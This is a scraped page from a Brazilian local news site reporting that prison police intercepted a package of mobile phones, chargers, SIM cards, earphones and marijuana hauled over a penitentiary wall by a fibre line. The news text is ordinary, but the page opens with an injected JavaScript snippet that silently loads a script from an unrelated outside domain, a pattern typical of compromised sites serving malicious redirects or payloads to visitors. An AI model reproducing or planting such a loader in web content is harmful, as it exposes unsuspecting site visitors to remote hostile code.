;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Policiais interceptam material jogado para um dos pátios da Penitenciária. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Policiais interceptam material jogado para um dos pátios da Penitenciária.

No início da madrugada deste domingo (12), por volta de uma hora, policiais penais, da equipe Bravo, que estavam de plantão, interceptaram, durante ronda na muralha da unidade Penitenciária Manoel Martins Lisboa Junior, diversos materiais que foram arremessadas para o interior do estabelecimento e provavelmente eram destinados aos presos.

Durante a ronda, um policial se deparou com uma linha de fibra atravessando o parte da muralha. De imediato acionou a guarda da muralha no local, ocasião em que viram um pacote, que foi arremessado para o interior do estabelecimento, próximo ao prédio do pavilhão II.

Naquele momento foi percebido que em uma das extremidades da fibra estava amarrado um pacote e na outra ponta estava o carretel, que ia até o perímetro externo da unidade, no pasto. O pacote então foi puxado pela fibra até os policiais na muralha.

O pacote foi aberto e os policiais encontraram três aparelhos celulares, três carregadores, três chips de telefonia móvel, três fones de ouvido e um tablete de maconha.

Depois do material apreendido, todas as medidas administrativas foram tomadas. Ainda foi realizada, pela equipe uma ronda externa na busca de possíveis outros materiais, bem como de rastros dos possíveis autores do fato, que não foram localizados. Em seguida foi confeccionado reds e a ocorrência foi passada para Polícia Civil.

Informação: Interligadoonline

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.